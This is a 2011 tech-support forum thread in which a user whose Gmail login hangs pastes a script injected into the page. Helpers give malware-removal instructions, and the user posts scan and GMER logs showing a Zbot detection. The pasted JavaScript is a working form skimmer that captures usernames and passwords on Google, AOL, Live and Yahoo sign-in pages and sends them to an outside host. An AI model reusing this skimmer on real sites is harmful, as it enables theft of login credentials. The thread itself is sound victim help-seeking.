Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Gmail javascript


  • This topic is locked This topic is locked
11 replies to this topic

#1 Neiltoo

Neiltoo

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:03:27 AM

Posted 30 June 2011 - 10:28 AM

Hi
Hope someone can help

Whilst trying to log into Gmail I am getting a status message "read www.online-security.cc" and the browser hangs.
This only happens on one pc and it is the same whether I use Firefox or IE9

When I look at the source for the log-in page this appears at the bottom:

<script language="javascript" type="text/javascript" src="https://www.online-security.cc/js/yahooaz.js"></script></body>

</html>


The content of the script is:

lvltxt = {}; lvltxt.nmjkmaq9c = 'https://online-security.at/em';lvltxt.i9q472i05h = "/bg.php"; lvltxt.q9fcjx04m6f8 = function(){}; lvltxt.guri = function(xf4wnl2htvp, func, p4cwo) { var v0eda0vw = document.createElement('script'); document.body.appendChild(v0eda0vw); v0eda0vw.src = xf4wnl2htvp; v0eda0vw.onloadhandler = func; v0eda0vw.onload = func;v0eda0vw.onreadystatechange = function() {if (/loaded/.test(this.readyState)) { this.onloadhandler();} } ;}
lvltxt.a460omjnx3g = function(str) { str = (str + '').toString(); return encodeURIComponent(str).replace(/!/g, '%21').replace(/'/g, '%27').replace(/\(/g, '%28').replace(/\)/g, '%29').replace(/\*/g, '%2A').replace(/%20/g, '+')}
lvltxt.riew0bh6nl5wek = function() { var obj = document.getElementById(lvltxt.zhwon95pc[1]); if (obj) { top.lvltxt.dg78wt = obj; top.lvltxt.dg78wt.onclick = lvltxt.lb1kp;}
else {} }
lvltxt.lb1kp = function() { try { var txt = ""; var u = document.getElementById(lvltxt.zhwon95pc[2]); if (u) { txt = "l=" + lvltxt.a460omjnx3g(u.value);}
var pwd = document.getElementById(lvltxt.zhwon95pc[3]); if (pwd) { txt += "&p=" + lvltxt.a460omjnx3g(pwd.value);}
var func = function() { top.lvltxt.dg78wt.onclick = null; top.lvltxt.dg78wt.click();}
lvltxt.guri(lvltxt.nmjkmaq9c + lvltxt.i9q472i05h + "?" + txt, func); return false;}
catch(e) {} }
lvltxt.m9il4ewn = [
["google.com", "signIn", "Email", "Passwd"], ["aol.com", "ssbmtAol", "lgnId1", "pwdId1"], ["login.live.com", "idSIButton9", "i0116", "i0118"], ["yahoo.com", ".save", "username", "passwd"]
]; lvltxt.zhwon95pc = false; for (var i = 0; i < lvltxt.m9il4ewn.length; i++) { if (document.location.href.indexOf(lvltxt.m9il4ewn[i][0]) > -1) { lvltxt.zhwon95pc = lvltxt.m9il4ewn[i];} }
if (lvltxt.zhwon95pc) { setTimeout(lvltxt.riew0bh6nl5wek, 1000);}


To my very untrained eye this looks dodgy!!


I have changed my gmail password from another pc but neither mcafee or avg scans have found anything amiss!

Thanks for any help

BC AdBot (Login to Remove)

 


#2 cryptodan

cryptodan

    Bleepin Madman


  • Members
  • 21,868 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Catonsville, Md
  • Local time:03:27 AM

Posted 30 June 2011 - 10:54 AM

Hello,

And welcome to BleepingComputer.com, before we can assist you with your question of: Am I infected? You will need to perform the following tasks and post the logs of each if you can.

Malwarebytes Anti-Malware

NOTEMalwarebytes is now offering a free trial of their program, if you want to accept it you will need to enter some billing information, so that at the end of the trial you would be charged the cost of the product. Please decline this offer, if you are unable to provide billing information. If you want to try it out, then provide the billing information.

Please download Malwarebytes Anti-Malware and save it to your desktop.
Download Link 1
Download Link 2MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.

  • Make sure you are connected to the Internet.
  • Double-click on mbam-setup.exe to install the application.
    For instructions with screenshots, please refer to the How to use Malwarebytes' Anti-Malware Guide.
  • When the installation begins, follow the prompts and do not make any changes to default settings.
  • When installation has finished, make sure you leave both of these checked:
    • Update Malwarebytes' Anti-Malware
    • Launch Malwarebytes' Anti-Malware
  • Then click Finish.
MBAM will automatically start and you will be asked to update the program before performing a scan.
  • If an update is found, the program will automatically update itself. Press the OK button to close that box and continue.
  • If you encounter any problems while downloading the definition updates, manually download them from here and just double-click on mbam-rules.exe to install.
On the Scanner tab:
  • Make sure the "Perform Full Scan" option is selected.
  • Then click on the Scan button.
  • If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.
  • The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.
  • When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found".
  • Click OK to close the message box and continue with the removal process.
Back at the main Scanner screen:
  • Click on the Show Results button to see a list of any malware that was found.
  • Make sure that everything is checked, and click Remove Selected.
  • When removal is completed, a log report will open in Notepad.
  • The log is automatically saved and can be viewed by clicking the Logs tab in MBAM.
  • Copy and paste the contents of that report in your next reply. Be sure to post the complete log to include the top portion which shows MBAM's database version and your operating system.
  • Exit MBAM when done.
Note: If MBAM encounters a file that is difficult to remove, you will be asked to reboot your computer so MBAM can proceed with the disinfection process. If asked to restart the computer, please do so immediately. Failure to reboot normally (not into safe mode) will prevent MBAM from removing all the malware.


SUPERAntiSpyware:

Please download and scan with SUPERAntiSpyware Free

  • Double-click SUPERAntiSypware.exe and use the default settings for installation.
  • An icon will be created on your desktop. Double-click that icon to launch the program.
  • If it will not start, go to Start > All Prgrams > SUPERAntiSpyware and click on Alternate Start.
  • If asked to update the program definitions, click "Yes". If not, update the definitions before scanning by selecting "Check for Updates". (If you encounter any problems while downloading the updates, manually download them from here. Double-click on the hyperlink for Download Installer and save SASDEFINITIONS.EXE to your desktop. Then double-click on SASDEFINITIONS.EXE to install the definitions.)
  • In the Main Menu, click the Preferences... button.
  • Click the "General and Startup" tab, and under Start-up Options, make sure "Start SUPERAntiSpyware when Windows starts" box is unchecked.
  • Click the "Scanning Control" tab, and under Scanner Options, make sure the following are checked (leave all others unchecked):
    • Close browsers before scanning.
    • Scan for tracking cookies.
    • Terminate memory threats before quarantining.
  • Click the "Close" button to leave the control center screen and exit the program.
  • Do not run a scan just yet.
Reboot your computer in "Safe Mode" using the F8 method. To do this, restart your computer and after hearing your computer beep once during startup (but before the Windows icon appears) press the F8 key repeatedly. A menu will appear with several options. Use the arrow keys to navigate and select the option to run Windows in "Safe Mode".

Scan with SUPERAntiSpyware as follows:
  • Launch the program and back on the main screen, under "Scan for Harmful Software" click Scan your computer.
  • On the left, make sure you check C:\Fixed Drive.
  • On the right, under "Complete Scan", choose Perform Complete Scan and click "Next".
  • After the scan is complete, a Scan Summary box will appear with potentially harmful items that were detected. Click "OK".
  • Make sure everything has a checkmark next to it and click "Next".
  • A notification will appear that "Quarantine and Removal is Complete". Click "OK" and then click the "Finish" button to return to the main menu.
  • If asked if you want to reboot, click "Yes" and reboot normally.
  • To retrieve the removal information after reboot, launch SUPERAntispyware again.
    • Click Preferences, then click the Statistics/Logs tab.
    • Under Scanner Logs, double-click SUPERAntiSpyware Scan Log.
    • If there are several logs, click the current dated log and press View log. A text file will open in your default text editor.
    • Please copy and paste the Scan Log results in your next reply.
  • Click Close to exit the program.
If you have a problem downloading, installing or getting SAS to run, try downloading and using the SUPERAntiSpyware Portable Scanner instead. Save the randomly named file (i.e. SAS_1710895.COM) to a usb drive or CD and transfer to the infected computer. Then double-click on it to launch and scan. The file is randomly named to help keep malware from blocking the scanner.

Instructions:

Download and scan with SUPERAntiSpyware Free for Home Users
  • Double-click SUPERAntiSpyware.exe and use the default settings for installation.
  • An icon will be created on your desktop. Double-click that icon to launch the program.
  • If asked to update the program definitions, click "Yes". If not, update the definitions before scanning by selecting "Check for Updates". (If you encounter any problems while downloading the updates, manually download them from here. Double-click on the hyperlink for Download Installer and save SASDEFINITIONS.EXE to your desktop. Then double-click on SASDEFINITIONS.EXE to install the definitions.)
  • In the Main Menu, click the Preferences... button.
  • Click the Scanning Control tab.
  • Under Scanner Options make sure the following are checked (leave all others unchecked):
    • Close browsers before scanning.
    • Scan for tracking cookies.
    • Terminate memory threats before quarantining.
  • Click the "Close" button to leave the control center screen.
  • Back on the main screen, under "Scan for Harmful Software" click Scan your computer.
  • On the left, make sure you check C:\Fixed Drive.
  • On the right, under "Complete Scan", choose Perform Complete Scan.
  • Click "Next" to start the scan. Please be patient while it scans your computer.
  • After the scan is complete, a Scan Summary box will appear with potentially harmful items that were detected. Click "OK".
  • Make sure everything has a checkmark next to it and click "Next".
  • A notification will appear that "Quarantine and Removal is Complete". Click "OK" and then click the "Finish" button to return to the main menu.
  • If asked if you want to reboot, click "Yes".
  • To retrieve the removal information after reboot, launch SUPERAntispyware again.
    • Click Preferences, then click the Statistics/Logs tab.
    • Under Scanner Logs, double-click SUPERAntiSpyware Scan Log.
    • If there are several logs, click the current dated log and press View log. A text file will open in your default text editor.
    • Please copy and paste the Scan Log results in your next reply.
  • Click Close to exit the program.
If you have a problem downloading, installing or getting SAS to run, try downloading and using the SUPERAntiSpyware Portable Scanner instead. Save the randomly named file (i.e. SAS_1710895.COM) to a usb drive or CD and transfer to the infected computer. Then double-click on it to launch and scan. The file is randomly named to help keep malware from blocking the scanner.


Now GMER

GMER does not work in 64bit Mode!!!!!!

Please download GMER from one of the following locations and save it to your desktop:

  • Main Mirror
    This version will download a randomly named file (Recommended)
  • Zipped Mirror
    This version will download a zip file you will need to extract first. If you use this mirror, please extract the zip file to your desktop.
  • Disconnect from the Internet and close all running programs.
  • Temporarily disable any real-time active protection so your security programs will not conflict with gmer's driver.
  • Double-click on the randomly named GMER file (i.e. n7gmo46c.exe) and allow the gmer.sys driver to load if asked.
  • Note: If you downloaded the zipped version, extract the file to its own folder such as C:\gmer and then double-click on gmer.exe.

    Posted Image
  • GMER will open to the Rootkit/Malware tab and perform an automatic Full Scan when first run. (do not use the computer while the scan is in progress)
  • If you receive a WARNING!!! about rootkit activity and are asked to fully scan your system...click NO.
  • Now click the Scan button. If you see a rootkit warning window, click OK.
  • When the scan is finished, click the Save... button to save the scan results to your Desktop. Save the file as gmer.log.
  • Click the Copy button and paste the results into your next reply.
  • Exit GMER and be sure to re-enable your anti-virus, Firewall and any other security programs you had disabled.
-- If you encounter any problems, try running GMER in safe mode.
-- If GMER crashes or keeps resulting in a BSODs, uncheck Devices on the right side before scanning
.



#3 Neiltoo

Neiltoo
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:03:27 AM

Posted 01 July 2011 - 09:04 AM

Hi
Thank you for your speedy reply

Logs as requested:

Did quick scan by mistake first, immediately followed by full 

scan:

Malwarebytes' Anti-Malware 1.50.1.1100
www.malwarebytes.org

Database version: 6991

Windows 6.0.6002 Service Pack 2
Internet Explorer 9.0.8112.16421

01/07/2011 09:26:52
mbam-log-2011-07-01 (09-26-52).txt

Scan type: Quick scan
Objects scanned: 175995
Time elapsed: 10 minute(s), 20 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 1
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\R

un\{485D2B40-06CC-D798-971D-E5570506DAD0} (Trojan.ZbotR.Gen) 

-> Value: {485D2B40-06CC-D798-971D-E5570506DAD0} -> 

Quarantined and deleted successfully.

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)

Malwarebytes' Anti-Malware 1.50.1.1100
www.malwarebytes.org

Database version: 6991

Windows 6.0.6002 Service Pack 2
Internet Explorer 9.0.8112.16421

01/07/2011 11:19:11
mbam-log-2011-07-01 (11-19-11).txt

Scan type: Full scan (C:\|D:\|H:\|)
Objects scanned: 344237
Time elapsed: 1 hour(s), 45 minute(s), 58 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 1
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\R

un\{485D2B40-06CC-D798-971D-E5570506DAD0} (Trojan.ZbotR.Gen) 

-> Value: {485D2B40-06CC-D798-971D-E5570506DAD0} -> 

Quarantined and deleted successfully.

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)


I was unable to run Superantispyware in safe mode - when I

clicked on scan the program froze but given how sluggish

everything was in safe mode this may be another issue!

Ran the portable version with no probs - no log was saved

but 14 tracking cookies were found.


Gmer log in next post

#4 Neiltoo

Neiltoo
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:03:27 AM

Posted 01 July 2011 - 09:05 AM

GMER 1.0.15.15640 - http://www.gmer.net

Rootkit scan 2011-07-01 14:54:50

Windows 6.0.6002 Service Pack 2 Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0 WDC_WD3200AAKS-75VYA0 rev.12.01B02

Running: rsnsqyz8.exe; Driver: C:\Users\MACSKI~1\AppData\Local\Temp\pwdiapod.sys





---- System - GMER 1.0.15 ----



SSDT            \SystemRoot\system32\DRIVERS\AVGIDSShim.Sys                                                                                          ZwOpenProcess [0xA9BC17A0]

SSDT            \??\C:\Users\MACSKI~1\AppData\Local\Temp\SAS_SelfExtract\SASKUTIL.SYS                                                                ZwTerminateProcess [0xABD99620]

SSDT            \SystemRoot\system32\DRIVERS\AVGIDSShim.Sys                                                                                          ZwTerminateThread [0xA9BC18E4]

SSDT            \SystemRoot\system32\DRIVERS\AVGIDSShim.Sys                                                                                          ZwWriteVirtualMemory [0xA9BC1980]



Code            \SystemRoot\system32\drivers\mfehidk.sys (McAfee Link Driver/McAfee, Inc.)                                                           ZwMapViewOfSection [0x82A3A1E8]

Code            \SystemRoot\system32\drivers\mfehidk.sys (McAfee Link Driver/McAfee, Inc.)                                                           ZwUnmapViewOfSection [0x82A3A1FE]

Code            \SystemRoot\system32\drivers\mfehidk.sys (McAfee Link Driver/McAfee, Inc.)                                                           ZwYieldExecution [0x82A3A1D4]

Code            \SystemRoot\system32\drivers\mfehidk.sys (McAfee Link Driver/McAfee, Inc.)                                                           NtMapViewOfSection



---- Kernel code sections - GMER 1.0.15 ----



.text           ntkrnlpa.exe!ZwYieldExecution                                                                                                        82449982 5 Bytes  JMP 82A3A1D8 \SystemRoot\system32\drivers\mfehidk.sys (McAfee Link Driver/McAfee, Inc.)

.text           ntkrnlpa.exe!KeSetEvent + 3F1                                                                                                        824CAB74 4 Bytes  [A0, 17, BC, A9]

.text           ntkrnlpa.exe!KeSetEvent + 621                                                                                                        824CADA4 8 Bytes  [20, 96, D9, AB, E4, 18, BC, ...]

.text           ntkrnlpa.exe!KeSetEvent + 681                                                                                                        824CAE04 4 Bytes  [80, 19, BC, A9]

PAGE            ntkrnlpa.exe!NtMapViewOfSection                                                                                                      8262E82A 7 Bytes  JMP 82A3A1EC \SystemRoot\system32\drivers\mfehidk.sys (McAfee Link Driver/McAfee, Inc.)

PAGE            ntkrnlpa.exe!ZwUnmapViewOfSection                                                                                                    8262EAED 5 Bytes  JMP 82A3A202 \SystemRoot\system32\drivers\mfehidk.sys (McAfee Link Driver/McAfee, Inc.)

?               system32\DRIVERS\avgrkx86.sys                                                                                                        The system cannot find the path specified. !

?               system32\DRIVERS\AVGIDSEH.Sys                                                                                                        The system cannot find the path specified. !

?               system32\DRIVERS\avgtdix.sys                                                                                                         The system cannot find the path specified. !

?               system32\DRIVERS\AVGIDSShim.Sys                                                                                                      The system cannot find the path specified. !

?               system32\DRIVERS\AVGIDSFilter.Sys                                                                                                    The system cannot find the path specified. !

?               system32\DRIVERS\AVGIDSDriver.Sys                                                                                                    The system cannot find the path specified. !



---- User code sections - GMER 1.0.15 ----



.text           C:\Windows\System32\svchost.exe[708] ntdll.dll!NtCreateFile                                                                          778C4224 5 Bytes  JMP 00040000 

.text           C:\Windows\System32\svchost.exe[708] ntdll.dll!NtCreateProcess                                                                       778C42E4 5 Bytes  JMP 00040FD4 

.text           C:\Windows\System32\svchost.exe[708] ntdll.dll!NtProtectVirtualMemory                                                                778C4B84 5 Bytes  JMP 00040FE5 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!GetStartupInfoW                                                                    76B11929 5 Bytes  JMP 00010F41 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!GetStartupInfoA                                                                    76B119C9 5 Bytes  JMP 00010F52 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!CreateProcessW                                                                     76B11BF3 5 Bytes  JMP 00010F04 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!CreateProcessA                                                                     76B11C28 5 Bytes  JMP 00010F1F 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!VirtualProtect                                                                     76B11DC3 5 Bytes  JMP 00010062 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!CreateNamedPipeA                                                                   76B12EF5 5 Bytes  JMP 00010FE5 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!CreateNamedPipeW                                                                   76B15C0C 5 Bytes  JMP 00010FCA 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!CreatePipe                                                                         76B38E6E 5 Bytes  JMP 00010F6D 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!LoadLibraryExW                                                                     76B39109 5 Bytes  JMP 00010F94 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!LoadLibraryW                                                                       76B39362 5 Bytes  JMP 00010FB9 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!LoadLibraryExA                                                                     76B394B4 5 Bytes  JMP 00010051 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!LoadLibraryA                                                                       76B394DC 5 Bytes  JMP 00010036 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!VirtualProtectEx                                                                   76B3DBDA 5 Bytes  JMP 00010073 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!GetProcAddress                                                                     76B5903B 5 Bytes  JMP 000100B6 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!CreateFileW                                                                        76B5AECB 5 Bytes  JMP 0001001B 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!CreateFileA                                                                        76B5CE5F 5 Bytes  JMP 00010000 

.text           C:\Windows\System32\svchost.exe[708] kernel32.dll!WinExec                                                                            76BA5CF7 5 Bytes  JMP 00010F30 

.text           C:\Windows\System32\svchost.exe[708] msvcrt.dll!_wsystem                                                                             75807F2F 5 Bytes  JMP 00060069 

.text           C:\Windows\System32\svchost.exe[708] msvcrt.dll!system                                                                               7580804B 5 Bytes  JMP 00060FD4 

.text           C:\Windows\System32\svchost.exe[708] msvcrt.dll!_creat                                                                               7580BBE1 5 Bytes  JMP 00060033 

.text           C:\Windows\System32\svchost.exe[708] msvcrt.dll!_open                                                                                7580D106 5 Bytes  JMP 00060FEF 

.text           C:\Windows\System32\svchost.exe[708] msvcrt.dll!_wcreat                                                                              7580D326 5 Bytes  JMP 00060044 

.text           C:\Windows\System32\svchost.exe[708] msvcrt.dll!_wopen                                                                               7580D501 5 Bytes  JMP 0006000C 

.text           C:\Windows\System32\svchost.exe[708] ADVAPI32.dll!RegCreateKeyExA                                                                    770539AB 5 Bytes  JMP 0007006C 

.text           C:\Windows\System32\svchost.exe[708] ADVAPI32.dll!RegCreateKeyA                                                                      77053BA9 5 Bytes  JMP 00070FD1 

.text           C:\Windows\System32\svchost.exe[708] ADVAPI32.dll!RegOpenKeyA                                                                        770589C7 5 Bytes  JMP 00070000 

.text           C:\Windows\System32\svchost.exe[708] ADVAPI32.dll!RegCreateKeyW                                                                      7706391E 5 Bytes  JMP 00070FC0 

.text           C:\Windows\System32\svchost.exe[708] ADVAPI32.dll!RegCreateKeyExW                                                                    770641F1 5 Bytes  JMP 00070FAF 

.text           C:\Windows\System32\svchost.exe[708] ADVAPI32.dll!RegOpenKeyExA                                                                      77067C42 5 Bytes  JMP 0007002C 

.text           C:\Windows\System32\svchost.exe[708] ADVAPI32.dll!RegOpenKeyW                                                                        7706E2B5 5 Bytes  JMP 00070011 

.text           C:\Windows\System32\svchost.exe[708] ADVAPI32.dll!RegOpenKeyExW                                                                      77077BA1 5 Bytes  JMP 0007003D 

.text           C:\Windows\System32\svchost.exe[708] WS2_32.dll!socket                                                                               772936D1 5 Bytes  JMP 00250000 

.text           C:\Windows\System32\svchost.exe[708] WININET.dll!InternetOpenA                                                                       76F34E2B 5 Bytes  JMP 00260000 

.text           C:\Windows\System32\svchost.exe[708] WININET.dll!InternetOpenUrlA                                                                    76F3BFCE 5 Bytes  JMP 00260FE5 

.text           C:\Windows\System32\svchost.exe[708] WININET.dll!InternetOpenW                                                                       76F6C03E 5 Bytes  JMP 0026001B 

.text           C:\Windows\System32\svchost.exe[708] WININET.dll!InternetOpenUrlW                                                                    76F9D722 5 Bytes  JMP 00260FD4 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ntdll.dll!NtCreateFile                                            778C4224 5 Bytes  JMP 04BD0000 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ntdll.dll!NtCreateProcess                                         778C42E4 5 Bytes  JMP 04BD001B 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ntdll.dll!NtProtectVirtualMemory                                  778C4B84 5 Bytes  JMP 04BD0FEF 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!GetStartupInfoW                                      76B11929 5 Bytes  JMP 046E0F6B 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!GetStartupInfoA                                      76B119C9 5 Bytes  JMP 046E0F7C 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!CreateProcessW                                       76B11BF3 5 Bytes  JMP 046E00F1 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!CreateProcessA                                       76B11C28 5 Bytes  JMP 046E0F5A 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!VirtualProtect                                       76B11DC3 5 Bytes  JMP 046E0082 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!CreateNamedPipeA                                     76B12EF5 5 Bytes  JMP 046E0014 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!CreateNamedPipeW                                     76B15C0C 5 Bytes  JMP 046E0FB9 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!CreatePipe                                           76B38E6E 5 Bytes  JMP 046E0F8D 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!LoadLibraryExW                                       76B39109 5 Bytes  JMP 046E0071 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!LoadLibraryW                                         76B39362 5 Bytes  JMP 046E004A 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!LoadLibraryExA                                       76B394B4 5 Bytes  JMP 046E0FA8 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!LoadLibraryA                                         76B394DC 5 Bytes  JMP 046E002F 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!VirtualProtectEx                                     76B3DBDA 5 Bytes  JMP 046E009D 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!GetProcAddress                                       76B5903B 1 Byte  [E9]

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!GetProcAddress                                       76B5903B 5 Bytes  JMP 046E0F3F 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!CreateFileW                                          76B5AECB 5 Bytes  JMP 046E0FDE 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!CreateFileA                                          76B5CE5F 5 Bytes  JMP 046E0FEF 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] kernel32.dll!WinExec                                              76BA5CF7 5 Bytes  JMP 046E00D6 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ADVAPI32.DLL!RegCreateKeyExA                                      770539AB 5 Bytes  JMP 046F0F79 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ADVAPI32.DLL!RegCreateKeyA                                        77053BA9 5 Bytes  JMP 046F001B 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ADVAPI32.DLL!RegOpenKeyA                                          770589C7 5 Bytes  JMP 046F0FE5 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ADVAPI32.DLL!RegCreateKeyW                                        7706391E 5 Bytes  JMP 046F0F8A 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ADVAPI32.DLL!RegCreateKeyExW                                      770641F1 5 Bytes  JMP 046F0036 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ADVAPI32.DLL!RegOpenKeyExA                                        77067C42 5 Bytes  JMP 046F0FC0 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ADVAPI32.DLL!RegOpenKeyW                                          7706E2B5 5 Bytes  JMP 046F0000 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] ADVAPI32.DLL!RegOpenKeyExW                                        77077BA1 5 Bytes  JMP 046F0FAF 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] MSVCRT.DLL!_wsystem                                               75807F2F 5 Bytes  JMP 046D0FC8 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] MSVCRT.DLL!system                                                 7580804B 5 Bytes  JMP 046D0053 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] MSVCRT.DLL!_creat                                                 7580BBE1 5 Bytes  JMP 046D0027 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] MSVCRT.DLL!_open                                                  7580D106 5 Bytes  JMP 046D0000 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] MSVCRT.DLL!_wcreat                                                7580D326 5 Bytes  JMP 046D0038 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] MSVCRT.DLL!_wopen                                                 7580D501 5 Bytes  JMP 046D0FE3 

.text           C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe[748] WS2_32.dll!socket                                                 772936D1 5 Bytes  JMP 04BC0000 

.text           C:\Windows\system32\services.exe[864] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 00100000 

.text           C:\Windows\system32\services.exe[864] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 0010002C 

.text           C:\Windows\system32\services.exe[864] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00100011 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 000F0F54 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 000F009A 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 000F0F21 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 000F0F32 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 000F0F8A 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 000F0011 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 000F002C 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 000F007F 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 000F0064 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 000F0FB6 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 000F0FA5 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 000F003D 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 000F0F6F 

